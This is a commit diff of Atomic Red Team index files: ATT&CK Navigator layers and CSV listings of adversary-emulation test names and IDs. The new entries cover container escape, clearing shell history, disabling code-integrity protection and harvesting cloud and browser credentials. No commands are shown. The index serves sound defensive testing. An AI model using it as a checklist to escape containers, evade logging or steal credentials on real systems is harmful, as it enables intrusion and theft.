Merge branch 'master' into T1078.003
This commit is contained in:
Biological Robot
@@ -1 +1 @@
|
||||
{"name":"Atomic Red Team (Containers)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1053","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1552","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":2,"enabled":true,"comment":"\n- List All Secrets\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"comment":"\n- Deploy Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"comment":"\n- Container and ResourceDiscovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]}]}
|
||||
{"name":"Atomic Red Team (Containers)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1046","score":1,"enabled":true,"comment":"\n- Network Service Discovery for Containers\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1053","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1069","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery for Containers- Local Groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1552","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":2,"enabled":true,"comment":"\n- List All Secrets\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"comment":"\n- Deploy Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"comment":"\n- Build Image On Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"comment":"\n- Container and ResourceDiscovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]}]}
|
||||
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
@@ -1,5 +1,6 @@
|
||||
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
|
||||
discovery,T1613,Container and Resource Discovery,1,Container and ResourceDiscovery,8a895923-f99f-4668-acf2-6cc59a44f05e,sh
|
||||
discovery,T1046,Network Service Discovery,9,Network Service Discovery for Containers,06eaafdb-8982-426e-8a31-d572da633caa,sh
|
||||
credential-access,T1552.007,Kubernetes List Secrets,1,List All Secrets,31e794c4-48fd-4a76-aca4-6587c155bc11,bash
|
||||
credential-access,T1552.007,Kubernetes List Secrets,2,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
|
||||
persistence,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
|
||||
@@ -14,3 +15,4 @@ privilege-escalation,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-
|
||||
privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter container escape,0b2f9520-a17a-4671-9dba-3bd034099fff,sh
|
||||
privilege-escalation,T1611,Escape to Host,2,Mount host filesystem to escape privileged Docker container,6c499943-b098-4bc6-8d38-0956fc182984,sh
|
||||
defense-evasion,T1610,Deploy a container,1,Deploy Docker container,59aa6f26-7620-417e-9318-589e0fb7a372,bash
|
||||
defense-evasion,T1612,Build Image on Host,1,Build Image On Host,2db30061-589d-409b-b125-7b473944f9b3,sh
|
||||
|
||||
|
@@ -250,6 +250,7 @@ defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,
|
||||
defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,2,LockBit Black - Modify Group policy settings -Powershell,b51eae65-5441-4789-b8e8-64783c26c1d1,powershell
|
||||
defense-evasion,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
|
||||
defense-evasion,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
|
||||
defense-evasion,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,command_prompt
|
||||
defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
|
||||
defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
|
||||
defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
|
||||
@@ -285,6 +286,7 @@ defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,1,Mount
|
||||
defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,2,Mount an ISO image and run executable from the ISO,42f22b00-0242-4afc-a61b-0da05041f9cc,powershell
|
||||
defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,3,Remove the Zone.Identifier alternate data stream,64b12afc-18b8-4d3f-9eab-7f6cae7c73f9,powershell
|
||||
defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,4,Execute LNK file from ISO,c2587b8d-743d-4985-aa50-c83394eaeb68,powershell
|
||||
defense-evasion,T1612,Build Image on Host,1,Build Image On Host,2db30061-589d-409b-b125-7b473944f9b3,sh
|
||||
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
|
||||
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
|
||||
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
|
||||
@@ -304,6 +306,11 @@ defense-evasion,T1564.002,Hide Artifacts: Hidden Users,2,Create Hidden User usin
|
||||
defense-evasion,T1564.002,Hide Artifacts: Hidden Users,3,Create Hidden User in Registry,173126b7-afe4-45eb-8680-fa9f6400431c,command_prompt
|
||||
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
|
||||
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
|
||||
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,3,Clear bash history,878794f7-c511-4199-a950-8c28b3ed8e5b,bash
|
||||
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,4,Setting the HISTCONTROL environment variable,10ab786a-028e-4465-96f6-9e83ca6c5f24,bash
|
||||
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,5,Setting the HISTFILESIZE environment variable,5cafd6c1-2f43-46eb-ac47-a5301ba0a618,bash
|
||||
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,6,Setting the HISTFILE environment variable,b3dacb6c-a9e3-44ec-bf87-38db60c5cad1,bash
|
||||
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,7,Setting the HISTIGNORE environment variable,f12acddb-7502-4ce6-a146-5b62c59592f1,bash
|
||||
defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
|
||||
defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
|
||||
defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
|
||||
@@ -365,6 +372,7 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,40,Suspend Hi
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,41,Reboot Linux Host via Kernel System Request,6d6d3154-1a52-4d1a-9d51-92ab8148b32e,sh
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,42,Clear Pagging Cache,f790927b-ea85-4a16-b7b2-7eb44176a510,sh
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,43,Disable Memory Swap,e74e4c63-6fde-4ad2-9ee8-21c3a1733114,sh
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,44,Disable Hypervisor-Enforced Code Integrity (HVCI),70bd71e6-eba4-4e00-92f7-617911dbe020,powershell
|
||||
defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
|
||||
defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
|
||||
defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
|
||||
@@ -553,6 +561,7 @@ privilege-escalation,T1484.001,Domain Policy Modification: Group Policy Modifica
|
||||
privilege-escalation,T1484.001,Domain Policy Modification: Group Policy Modification,2,LockBit Black - Modify Group policy settings -Powershell,b51eae65-5441-4789-b8e8-64783c26c1d1,powershell
|
||||
privilege-escalation,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
|
||||
privilege-escalation,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
|
||||
privilege-escalation,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,command_prompt
|
||||
privilege-escalation,T1547.003,Time Providers,1,Create a new time provider,df1efab7-bc6d-4b88-8be9-91f55ae017aa,powershell
|
||||
privilege-escalation,T1547.003,Time Providers,2,Edit an existing time provider,29e0afca-8d1d-471a-8d34-25512fc48315,powershell
|
||||
privilege-escalation,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
|
||||
@@ -838,6 +847,7 @@ persistence,T1574.008,Hijack Execution Flow: Path Interception by Search Order H
|
||||
persistence,T1505.003,Server Software Component: Web Shell,1,Web Shell Written to Disk,0a2ce662-1efa-496f-a472-2fe7b080db16,command_prompt
|
||||
persistence,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
|
||||
persistence,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
|
||||
persistence,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,command_prompt
|
||||
persistence,T1547.003,Time Providers,1,Create a new time provider,df1efab7-bc6d-4b88-8be9-91f55ae017aa,powershell
|
||||
persistence,T1547.003,Time Providers,2,Edit an existing time provider,29e0afca-8d1d-471a-8d34-25512fc48315,powershell
|
||||
persistence,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
|
||||
@@ -1158,17 +1168,18 @@ credential-access,T1003.005,OS Credential Dumping: Cached Domain Credentials,1,C
|
||||
credential-access,T1558.001,Steal or Forge Kerberos Tickets: Golden Ticket,1,Crafting Active Directory golden tickets with mimikatz,9726592a-dabc-4d4d-81cd-44070008b3af,powershell
|
||||
credential-access,T1558.001,Steal or Forge Kerberos Tickets: Golden Ticket,2,Crafting Active Directory golden tickets with Rubeus,e42d33cd-205c-4acf-ab59-a9f38f6bad9c,powershell
|
||||
credential-access,T1552.003,Unsecured Credentials: Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,6,WinPwn - sensitivefiles,114dd4e3-8d1c-4ea7-bb8d-8d8f6aca21f0,powershell
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,7,WinPwn - Snaffler,fdd0c913-714b-4c13-b40f-1824d6c015f2,powershell
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,8,WinPwn - powershellsensitive,75f66e03-37d3-4704-9520-3210efbe33ce,powershell
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,9,WinPwn - passhunt,00e3e3c7-6c3c-455e-bd4b-461c7f0e7797,powershell
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,10,WinPwn - SessionGopher,c9dc9de3-f961-4284-bd2d-f959c9f9fda5,powershell
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,11,"WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials",aaa87b0e-5232-4649-ae5c-f1724a4b2798,powershell
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,1,Find AWS credentials,2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17,sh
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,2,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,3,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,4,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,5,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,6,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,7,WinPwn - sensitivefiles,114dd4e3-8d1c-4ea7-bb8d-8d8f6aca21f0,powershell
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,8,WinPwn - Snaffler,fdd0c913-714b-4c13-b40f-1824d6c015f2,powershell
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,9,WinPwn - powershellsensitive,75f66e03-37d3-4704-9520-3210efbe33ce,powershell
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,10,WinPwn - passhunt,00e3e3c7-6c3c-455e-bd4b-461c7f0e7797,powershell
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,11,WinPwn - SessionGopher,c9dc9de3-f961-4284-bd2d-f959c9f9fda5,powershell
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,12,"WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials",aaa87b0e-5232-4649-ae5c-f1724a4b2798,powershell
|
||||
credential-access,T1528,Steal Application Access Token,1,Azure - Dump All Azure Key Vaults with Microburst,1b83cddb-eaa7-45aa-98a5-85fb0a8807ea,powershell
|
||||
credential-access,T1552.006,Unsecured Credentials: Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
|
||||
credential-access,T1552.006,Unsecured Credentials: Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
|
||||
@@ -1363,6 +1374,7 @@ discovery,T1069.001,Permission Groups Discovery: Local Groups,3,Permission Group
|
||||
discovery,T1069.001,Permission Groups Discovery: Local Groups,4,SharpHound3 - LocalAdmin,e03ada14-0980-4107-aff1-7783b2b59bb1,powershell
|
||||
discovery,T1069.001,Permission Groups Discovery: Local Groups,5,Wmic Group Discovery,7413be50-be8e-430f-ad4d-07bf197884b2,powershell
|
||||
discovery,T1069.001,Permission Groups Discovery: Local Groups,6,WMIObject Group Discovery,69119e58-96db-4110-ad27-954e48f3bb13,powershell
|
||||
discovery,T1069.001,Permission Groups Discovery: Local Groups,7,Permission Groups Discovery for Containers- Local Groups,007d7aa4-8c4d-4f55-ba6a-7c965d51219c,sh
|
||||
discovery,T1201,Password Policy Discovery,1,Examine password complexity policy - Ubuntu,085fe567-ac84-47c7-ac4c-2688ce28265b,bash
|
||||
discovery,T1201,Password Policy Discovery,2,Examine password complexity policy - CentOS/RHEL 7.x,78a12e65-efff-4617-bc01-88f17d71315d,bash
|
||||
discovery,T1201,Password Policy Discovery,3,Examine password complexity policy - CentOS/RHEL 6.x,6ce12552-0adb-4f56-89ff-95ce268f6358,bash
|
||||
@@ -1410,14 +1422,15 @@ discovery,T1018,Remote System Discovery,17,Enumerate Active Directory Computers
|
||||
discovery,T1018,Remote System Discovery,18,Get-DomainController with PowerView,b9d2e8ca-5520-4737-8076-4f08913da2c4,powershell
|
||||
discovery,T1018,Remote System Discovery,19,Get-wmiobject to Enumerate Domain Controllers,e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad,powershell
|
||||
discovery,T1018,Remote System Discovery,20,Remote System Discovery - net group Domain Controller,5843529a-5056-4bc1-9c13-a311e2af4ca0,command_prompt
|
||||
discovery,T1046,Network Service Scanning,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
|
||||
discovery,T1046,Network Service Scanning,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
|
||||
discovery,T1046,Network Service Scanning,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
|
||||
discovery,T1046,Network Service Scanning,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
|
||||
discovery,T1046,Network Service Scanning,5,WinPwn - spoolvulnscan,54574908-f1de-4356-9021-8053dd57439a,powershell
|
||||
discovery,T1046,Network Service Scanning,6,WinPwn - MS17-10,97585b04-5be2-40e9-8c31-82157b8af2d6,powershell
|
||||
discovery,T1046,Network Service Scanning,7,WinPwn - bluekeep,1cca5640-32a9-46e6-b8e0-fabbe2384a73,powershell
|
||||
discovery,T1046,Network Service Scanning,8,WinPwn - fruit,bb037826-cbe8-4a41-93ea-b94059d6bb98,powershell
|
||||
discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
|
||||
discovery,T1046,Network Service Discovery,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
|
||||
discovery,T1046,Network Service Discovery,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
|
||||
discovery,T1046,Network Service Discovery,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
|
||||
discovery,T1046,Network Service Discovery,5,WinPwn - spoolvulnscan,54574908-f1de-4356-9021-8053dd57439a,powershell
|
||||
discovery,T1046,Network Service Discovery,6,WinPwn - MS17-10,97585b04-5be2-40e9-8c31-82157b8af2d6,powershell
|
||||
discovery,T1046,Network Service Discovery,7,WinPwn - bluekeep,1cca5640-32a9-46e6-b8e0-fabbe2384a73,powershell
|
||||
discovery,T1046,Network Service Discovery,8,WinPwn - fruit,bb037826-cbe8-4a41-93ea-b94059d6bb98,powershell
|
||||
discovery,T1046,Network Service Discovery,9,Network Service Discovery for Containers,06eaafdb-8982-426e-8a31-d572da633caa,sh
|
||||
discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt
|
||||
discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell
|
||||
discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
|
||||
@@ -1540,6 +1553,7 @@ initial-access,T1091,Replication Through Removable Media,1,USB Malware Spread Si
|
||||
initial-access,T1195,Supply Chain Compromise,1,Octopus Scanner Malware Open Source Supply Chain,82a9f001-94c5-495e-9ed5-f530dbded5e2,command_prompt
|
||||
initial-access,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
|
||||
initial-access,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
|
||||
initial-access,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,command_prompt
|
||||
initial-access,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
|
||||
initial-access,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
|
||||
initial-access,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
|
||||
|
||||
|
@@ -69,6 +69,11 @@ defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,1,Auditing Configu
|
||||
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,2,Logging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash
|
||||
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
|
||||
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
|
||||
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,3,Clear bash history,878794f7-c511-4199-a950-8c28b3ed8e5b,bash
|
||||
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,4,Setting the HISTCONTROL environment variable,10ab786a-028e-4465-96f6-9e83ca6c5f24,bash
|
||||
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,5,Setting the HISTFILESIZE environment variable,5cafd6c1-2f43-46eb-ac47-a5301ba0a618,bash
|
||||
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,6,Setting the HISTFILE environment variable,b3dacb6c-a9e3-44ec-bf87-38db60c5cad1,bash
|
||||
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,7,Setting the HISTIGNORE environment variable,f12acddb-7502-4ce6-a146-5b62c59592f1,bash
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,1,Disable syslog,4ce786f8-e601-44b5-bfae-9ebb15a7d1c8,sh
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,2,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,3,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh
|
||||
@@ -194,8 +199,9 @@ credential-access,T1552.004,Unsecured Credentials: Private Keys,3,Copy Private S
|
||||
credential-access,T1552.004,Unsecured Credentials: Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
|
||||
credential-access,T1552.004,Unsecured Credentials: Private Keys,5,Copy the users GnuPG directory with rsync,2a5a0601-f5fb-4e2e-aa09-73282ae6afca,sh
|
||||
credential-access,T1552.003,Unsecured Credentials: Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,1,Find AWS credentials,2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17,sh
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,3,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,6,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
|
||||
credential-access,T1110.004,Brute Force: Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash
|
||||
credential-access,T1003.008,OS Credential Dumping: /etc/passwd and /etc/shadow,1,Access /etc/shadow (Local),3723ab77-c546-403c-8fb4-bb577033b235,bash
|
||||
credential-access,T1003.008,OS Credential Dumping: /etc/passwd and /etc/shadow,2,Access /etc/passwd (Local),60e860b6-8ae6-49db-ad07-5e73edd88f5d,sh
|
||||
@@ -243,8 +249,8 @@ discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db26
|
||||
discovery,T1018,Remote System Discovery,12,Remote System Discovery - ip neighbour,158bd4dd-6359-40ab-b13c-285b9ef6fa25,sh
|
||||
discovery,T1018,Remote System Discovery,13,Remote System Discovery - ip route,1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1,sh
|
||||
discovery,T1018,Remote System Discovery,14,Remote System Discovery - ip tcp_metrics,6c2da894-0b57-43cb-87af-46ea3b501388,sh
|
||||
